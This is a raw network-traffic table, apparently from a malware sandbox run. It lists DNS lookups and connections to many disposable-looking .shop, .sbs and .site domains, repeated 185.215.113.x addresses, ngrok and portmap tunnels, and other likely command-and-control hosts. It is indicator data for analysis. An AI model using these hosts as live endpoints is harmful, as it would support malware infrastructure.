| US | 8.8.8.8:53 | stogeneratmns.shop | udp |
| US | 8.8.8.8:53 | reinforcenh.shop | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| FR | 176.150.119.15:56001 | tcp | |
| MX | 189.133.11.24:40500 | udp | |
| US | 8.8.8.8:53 | 24.11.133.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 300snails.sbs | udp |
| US | 8.8.8.8:53 | thicktoys.sbs | udp |
| US | 8.8.8.8:53 | fleez-inc.sbs | udp |
| US | 8.8.8.8:53 | pull-trucker.sbs | udp |
| US | 8.8.8.8:53 | 3xc1aimbl0w.sbs | udp |
| US | 8.8.8.8:53 | bored-light.sbs | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | faintbl0w.sbs | udp |
| US | 8.8.8.8:53 | crib-endanger.sbs | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| UZ | 213.206.44.35:40500 | udp | |
| US | 8.8.8.8:53 | 35.44.206.213.in-addr.arpa | udp |
| UZ | 213.230.99.119:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| DE | 85.10.193.220:80 | tcp | |
| UZ | 195.158.22.4:40500 | udp | |
| US | 8.8.8.8:53 | 220.193.10.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.22.158.195.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 213.230.97.138:40500 | udp | |
| US | 8.8.8.8:53 | 138.97.230.213.in-addr.arpa | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 90.156.163.33:40500 | udp | |
| US | 8.8.8.8:53 | 33.163.156.90.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 89.218.186.142:40500 | udp | |
| US | 8.8.8.8:53 | 142.186.218.89.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 93.123.145.179:40500 | udp | |
| US | 8.8.8.8:53 | 179.145.123.93.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| EG | 62.114.143.56:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 89.249.62.14:40500 | udp | |
| US | 8.8.8.8:53 | 14.62.249.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| IR | 2.179.117.33:40500 | udp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | 33.117.179.2.in-addr.arpa | udp |
| US | 137.184.144.245:4782 | tcp | |
| KZ | 5.63.94.144:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 144.94.63.5.in-addr.arpa | udp |
| UZ | 90.156.164.28:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 89.249.62.94:40500 | udp | |
| US | 8.8.8.8:53 | 94.62.249.89.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | home.sevkk17vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| MX | 189.136.17.247:40500 | udp | |
| US | 8.8.8.8:53 | 247.17.136.189.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 89.236.218.158:40500 | udp | |
| US | 8.8.8.8:53 | 158.218.236.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 37.78.33.95:40500 | udp | |
| US | 8.8.8.8:53 | 95.33.78.37.in-addr.arpa | udp |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.206:80 | 185.215.113.206 | tcp |
| KZ | 178.91.28.42:40500 | udp | |
| US | 8.8.8.8:53 | 206.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.28.91.178.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| MX | 201.138.180.213:40500 | tcp | |
| YE | 46.35.84.77:40500 | udp | |
| US | 8.8.8.8:53 | property-imper.sbs | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | frogs-severz.sbs | udp |
| US | 8.8.8.8:53 | occupy-blushi.sbs | udp |
| US | 8.8.8.8:53 | blade-govern.sbs | udp |
| US | 104.21.80.208:443 | blade-govern.sbs | tcp |
| US | 8.8.8.8:53 | 77.84.35.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.80.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | story-tense-faz.sbs | udp |
| US | 104.21.1.25:443 | story-tense-faz.sbs | tcp |
| US | 8.8.8.8:53 | leg-sate-boat.sbs | udp |
| US | 8.8.8.8:53 | disobey-curly.sbs | udp |
| US | 104.21.70.128:443 | disobey-curly.sbs | tcp |
| US | 8.8.8.8:53 | 25.1.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | motion-treesz.sbs | udp |
| US | 104.21.94.231:443 | motion-treesz.sbs | tcp |
| US | 8.8.8.8:53 | powerful-avoids.sbs | udp |
| US | 172.67.187.4:443 | powerful-avoids.sbs | tcp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 128.70.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.94.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.187.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| KZ | 37.151.73.50:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 50.73.151.37.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 95.59.171.222:40500 | udp | |
| US | 8.8.8.8:53 | 222.171.59.95.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| IR | 2.185.189.167:40500 | udp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | 167.189.185.2.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | property-imper.sbs | udp |
| US | 8.8.8.8:53 | frogs-severz.sbs | udp |
| US | 8.8.8.8:53 | occupy-blushi.sbs | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 104.21.80.208:443 | blade-govern.sbs | tcp |
| UZ | 90.156.161.82:40500 | udp | |
| US | 104.21.1.25:443 | story-tense-faz.sbs | tcp |
| US | 8.8.8.8:53 | leg-sate-boat.sbs | udp |
| US | 104.21.70.128:443 | disobey-curly.sbs | tcp |
| US | 8.8.8.8:53 | 82.161.156.90.in-addr.arpa | udp |
| US | 104.21.94.231:443 | motion-treesz.sbs | tcp |
| US | 172.67.187.4:443 | powerful-avoids.sbs | tcp |
| US | 64.190.113.79:443 | tcp | |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| IR | 2.176.94.43:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 89.218.244.178:40500 | udp | |
| US | 8.8.8.8:53 | 178.244.218.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| EG | 197.121.126.87:40500 | udp | |
| US | 8.8.8.8:53 | 87.126.121.197.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 92.46.228.246:40500 | udp | |
| US | 8.8.8.8:53 | 246.228.46.92.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| IR | 185.71.153.146:40500 | udp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | 146.153.71.185.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| PK | 39.48.235.83:40500 | udp | |
| US | 8.8.8.8:53 | 83.235.48.39.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 213.211.105.70:40500 | udp | |
| UZ | 90.156.163.123:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 70.105.211.213.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| KZ | 89.218.186.86:40500 | udp | |
| US | 8.8.8.8:53 | 86.186.218.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 90.156.162.106:40500 | udp | |
| US | 8.8.8.8:53 | 106.162.156.90.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| MX | 187.230.224.82:40500 | udp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | 82.224.230.187.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| YE | 46.161.239.195:40500 | udp | |
| US | 8.8.8.8:53 | 195.239.161.46.in-addr.arpa | udp |
| IR | 5.202.242.190:40500 | tcp | |
| IR | 151.232.179.149:40500 | udp | |
| US | 8.8.8.8:53 | 149.179.232.151.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 213.230.69.230:40500 | udp | |
| US | 8.8.8.8:53 | 230.69.230.213.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| SY | 77.44.150.37:40500 | udp | |
| US | 8.8.8.8:53 | 37.150.44.77.in-addr.arpa | udp |
| NE | 41.138.38.164:40500 | udp | |
| US | 8.8.8.8:53 | 164.38.138.41.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| AM | 109.68.122.14:40500 | udp | |
| US | 8.8.8.8:53 | 14.122.68.109.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| DE | 159.100.18.229:40500 | tcp | |
| US | 8.8.8.8:53 | 229.18.100.159.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| UZ | 89.236.216.14:40500 | udp | |
| US | 8.8.8.8:53 | 14.216.236.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| BG | 146.70.53.161:40500 | udp | |
| US | 8.8.8.8:53 | 161.53.70.146.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 31.8.29.135:40500 | tcp | |
| YE | 178.130.103.42:40500 | udp | |
| US | 8.8.8.8:53 | 42.103.130.178.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 213.230.126.169:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 169.126.230.213.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| CN | 8.130.42.227:10001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 2.133.45.6:40500 | udp | |
| US | 8.8.8.8:53 | 6.45.133.2.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 93.188.86.253:40500 | udp | |
| US | 8.8.8.8:53 | 253.86.188.93.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| YE | 134.35.100.89:40500 | udp | |
| US | 8.8.8.8:53 | 89.100.35.134.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| SY | 77.44.228.98:40500 | tcp | |
| EG | 45.241.38.203:40500 | udp | |
| US | 8.8.8.8:53 | 203.38.241.45.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | cdn.ly.9377.com | udp |
| GB | 79.133.176.200:80 | cdn.ly.9377.com | tcp |
| N/A | 192.168.1.13:5555 | tcp | |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 200.176.133.79.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | client.9377.com | udp |
| CN | 120.79.30.240:80 | client.9377.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| CN | 120.76.203.28:80 | client.9377.com | tcp |
| RU | 185.215.113.217:80 | 185.215.113.217 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:80 | 170.114.78.80 | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | www.python.org | udp |
| US | 151.101.128.223:443 | www.python.org | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 8.8.8.8:53 | 223.128.101.151.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 137.184.144.245:4782 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 64.190.113.79:443 | tcp | |
| CN | 112.74.95.85:8888 | tcp | |
| US | 8.8.8.8:53 | blasterrysbio.cyou | udp |
| US | 8.8.8.8:53 | worddosofrm.shop | udp |
| US | 8.8.8.8:53 | mutterissuen.shop | udp |
| US | 8.8.8.8:53 | standartedby.shop | udp |
| US | 8.8.8.8:53 | nightybinybz.shop | udp |
| US | 8.8.8.8:53 | conceszustyb.shop | udp |
| US | 8.8.8.8:53 | bakedstusteeb.shop | udp |
| US | 8.8.8.8:53 | respectabosiz.shop | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | moutheventushz.shop | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | www.y2126.com | udp |
| UZ | 94.141.68.56:40500 | udp | |
| KZ | 95.58.91.70:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 56.68.141.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KR | 123.214.186.171:40500 | udp | |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.186.214.123.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:80 | 170.114.78.80 | tcp |
| GE | 62.212.36.229:40500 | udp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | 229.36.212.62.in-addr.arpa | udp |
| N/A | 192.168.100.18:4782 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | tmpfiles.org | udp |
| US | 172.67.195.247:443 | tmpfiles.org | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 104.26.2.16:443 | rentry.co | tcp |
| US | 137.184.144.245:4782 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | 247.195.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.2.26.104.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| TJ | 109.74.69.43:40500 | udp | |
| US | 8.8.8.8:53 | 43.69.74.109.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| KZ | 92.47.143.122:40500 | udp | |
| US | 8.8.8.8:53 | 122.143.47.92.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| YE | 46.161.239.195:40500 | udp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| SY | 82.137.239.235:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| CI | 160.155.209.135:40500 | udp | |
| US | 8.8.8.8:53 | 135.209.155.160.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| TH | 154.197.69.165:80 | 154.197.69.165 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 165.69.197.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jZFqZYoOtpryMyRHD.jZFqZYoOtpryMyRHD | udp |
| TR | 85.103.235.188:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 188.235.103.85.in-addr.arpa | udp |
| CN | 111.231.145.137:8888 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 137.184.144.245:4782 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| SY | 95.212.18.228:40500 | udp | |
| US | 8.8.8.8:53 | 228.18.212.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 20.83.148.22:80 | 170.114.78.80 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| KZ | 5.251.234.88:40500 | udp | |
| US | 8.8.8.8:53 | 88.234.251.5.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| TH | 154.197.69.165:7000 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 213.230.99.184:40500 | udp | |
| US | 8.8.8.8:53 | 184.99.230.213.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| IR | 2.181.30.194:40500 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 215.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| US | 8.8.8.8:53 | freedns.afraid.org | udp |
| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| YE | 94.26.219.44:40500 | udp | |
| US | 8.8.8.8:53 | 252.215.42.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.219.26.94.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| CN | 47.115.166.43:80 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| MX | 187.230.224.82:40500 | udp | |
| IR | 46.100.82.131:40500 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| US | 137.184.144.245:4782 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| KZ | 5.63.94.144:40500 | udp | |
| US | 64.190.113.79:443 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| UZ | 89.236.216.14:40500 | udp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| IR | 5.232.126.125:40500 | udp | |
| US | 8.8.8.8:53 | 125.126.232.5.in-addr.arpa | udp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| RU | 185.215.113.217:80 | 185.215.113.217 | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:80 | 170.114.78.80 | tcp |
| US | 64.190.113.79:443 | tcp | |
| IR | 94.183.35.46:40500 | udp | |
| US | 8.8.8.8:53 | 46.35.183.94.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| HU | 38.180.109.140:20007 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 64.190.113.79:443 | tcp | |
| N/A | 192.168.100.18:4782 | tcp | |
| MX | 189.167.5.148:40500 | udp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 148.5.167.189.in-addr.arpa | udp |
| US | 137.184.144.245:4782 | tcp | |
| SA | 193.122.74.238:1337 | 193.122.74.238 | tcp |
| PK | 182.188.65.58:40500 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 238.74.122.193.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | www.teknoarge.com | udp |
| TR | 31.145.124.122:80 | www.teknoarge.com | tcp |
| US | 8.8.8.8:53 | 122.124.145.31.in-addr.arpa | udp |
| FR | 176.150.119.15:56001 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| UZ | 87.237.236.86:40500 | udp | |
| US | 8.8.8.8:53 | 86.236.237.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 20.83.148.22:80 | www.zillow.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 64.190.113.79:443 | tcp | |
| RU | 193.233.48.194:80 | 193.233.48.194 | tcp |
| US | 8.8.8.8:53 | roaddrermncomplai.shop | udp |
| US | 8.8.8.8:53 | racedsuitreow.shop | udp |
| US | 8.8.8.8:53 | defenddsouneuw.shop | udp |
| US | 8.8.8.8:53 | deallyharvenw.shop | udp |
| US | 8.8.8.8:53 | priooozekw.shop | udp |
| US | 8.8.8.8:53 | pumpkinkwquo.shop | udp |
| US | 8.8.8.8:53 | abortinoiwiam.shop | udp |
| US | 8.8.8.8:53 | surroundeocw.shop | udp |
| US | 8.8.8.8:53 | covvercilverow.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | 194.48.233.193.in-addr.arpa | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | marshal-zhukov.com | udp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| IN | 59.91.192.115:40500 | udp | |
| US | 8.8.8.8:53 | 115.192.91.59.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| TR | 31.145.124.122:443 | www.teknoarge.com | tcp |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | loeghaiofiehfihf.to | udp |
| RU | 185.215.113.66:80 | loeghaiofiehfihf.to | tcp |
| HU | 38.180.109.140:20007 | tcp | |
| GB | 89.197.154.115:80 | 89.197.154.115 | tcp |
| US | 8.8.8.8:53 | 115.154.197.89.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| GB | 89.197.154.115:7700 | tcp | |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 52.57.120.10:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | 10.120.57.52.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | delaylacedmn.site | udp |
| US | 8.8.8.8:53 | famikyjdiag.site | udp |
| US | 8.8.8.8:53 | possiwreeste.site | udp |
| US | 8.8.8.8:53 | commandejorsk.site | udp |
| US | 8.8.8.8:53 | underlinemdsj.site | udp |
| US | 8.8.8.8:53 | bellykmrebk.site | udp |
| US | 8.8.8.8:53 | agentyanlark.site | udp |
| US | 8.8.8.8:53 | writekdmsnu.site | udp |
| US | 64.190.113.79:443 | tcp | |
| US | 8.8.8.8:53 | dez345-37245.portmap.host | udp |
| PK | 202.70.150.106:40500 | udp | |
| DE | 193.161.193.99:37245 | dez345-37245.portmap.host | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.150.70.202.in-addr.arpa | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| US | 172.67.160.80:443 | marshal-zhukov.com | tcp |
| DE | 3.78.28.71:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.net | udp |
| RU | 185.215.113.66:80 | aiiaiafrzrueuedur.net | tcp |
| HU | 38.180.109.140:20007 | tcp | |
| US | 8.8.8.8:53 | 71.28.78.3.in-addr.arpa | udp |
| US | 64.190.113.79:443 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | thizx13vt.top | udp |
| US | 8.8.8.8:53 | wrappyskmwio.store | udp |
| US | 8.8.8.8:53 | questionsmw.store | udp |
| US | 8.8.8.8:53 | soldiefieop.site | udp |
| US | 8.8.8.8:53 | abnomalrkmu.site | udp |
| US | 8.8.8.8:53 | chorusarorp.site | udp |
| US | 8.8.8.8:53 | treatynreit.site | udp |
| US | 8.8.8.8:53 | snarlypagowo.site | udp |
| US | 8.8.8.8:53 | mysterisop.site | udp |
| US | 8.8.8.8:53 | absorptioniw.site | udp |
| GB | 2.22.99.85:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | egorepetiiiosn.shop | udp |
